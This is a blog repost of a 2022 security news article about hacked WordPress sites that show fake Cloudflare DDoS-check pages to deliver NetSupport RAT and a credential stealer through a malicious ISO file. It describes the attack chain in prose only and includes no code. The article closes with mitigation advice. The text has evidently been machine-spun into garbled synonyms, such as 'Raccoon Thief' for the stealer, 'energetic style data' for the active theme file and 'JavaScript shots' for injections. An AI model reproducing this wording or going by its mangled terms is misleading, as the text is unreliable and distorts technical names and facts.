Colin Mc Hugo

0 %
Colin Mc Hugo
Security Engineer Manager & CEO at Quantum Infinite Solutions Group Ltd.

Hackers Using Fake DDoS Protection Pages to Distribute Malware

August 24, 2022

WordPress websites are being hacked to show deceptive Cloudflare DDoS security web pages that result in the distribution of malware such as NetSupport RAT and also Raccoon Thief.

” A current rise in JavaScript shots targeting WordPress websites has actually led to phony DDoS stop motivates which lead targets to download and install remote gain access to trojan malware,” Sucuri’s Ben Martin said in a review released recently.

Dispersed denial-of-service (DDoS) security web pages are vital web browser confirmation checks made to prevent bot-driven undesirable and also destructive website traffic from consuming transmission capacity and also removing web sites.

The brand-new assault vector entails pirating WordPress websites to show phony DDoS security pop-ups that, when clicked, inevitably result in the download of a destructive ISO data (” security_install. iso”) to the sufferer’s systems.


This is attained by infusing 3 lines of code right into a JavaScript data (” jquery.min.js”), or conversely right into the energetic style data of the internet site, which, subsequently, lots greatly obfuscated JavaScript from a remote web server.

” This JavaScript after that connects with a 2nd destructive domain name which lots much more JavaScript that starts the download timely for the malicious.iso data,” Martin discussed.

Adhering to the download, individuals are triggered to get in a confirmation code created from the supposed “DDoS Guard” application so regarding attract the sufferer right into opening up the weaponized installer data and also accessing the location internet site.

While the installer does show a confirmation code to preserve the ploy, in truth, the data is a remote gain access to trojan called NetSupport RAT, which is connected to the FakeUpdates (also known as SocGholish) malware family members as well as likewise discreetly sets up Raccoon Thief, a credential-stealing trojan offered for lease on below ground discussion forums.

The advancement is an indicator that assaulters are opportunistically co-opting these acquainted protection systems in their very own projects in a quote to deceive unwary internet site site visitors right into setting up malware.

DDoS Attack

To reduce such risks, internet site proprietors are called for to position their websites behind a firewall software, utilize data honesty checks, and also impose two-factor verification (2FA). Web site site visitors are likewise advised to switch on 2FA, prevent opening up dubious data, and also utilize a manuscript blocker in internet internet browsers to stop the implementation of JavaScript.


” The contaminated computer system can be utilized to swipe social media sites or financial qualifications, detonate ransomware, or perhaps allure the sufferer right into a rotten ‘servant’ network, obtain the computer system proprietor, and also break their personal privacy– all depending upon what the assaulters determine to do with the endangered tool,” Martin stated.

This isn’t the very first time ISO-themed data and also CAPTCHA checks have actually been utilized to supply the NetSupport RAT.

In April 2022, eSentire disclosed an assault chain that leveraged a phony Chrome installer to release the trojan, which after that led the way for the implementation of Mars Thief. Furthermore, an IRS-themed phishing project described by Cofense and also Walmart Global Tech entailed using phony CAPTCHA challenges on web sites to supply the very same malware.

Posted in SecurityTags:
Write a comment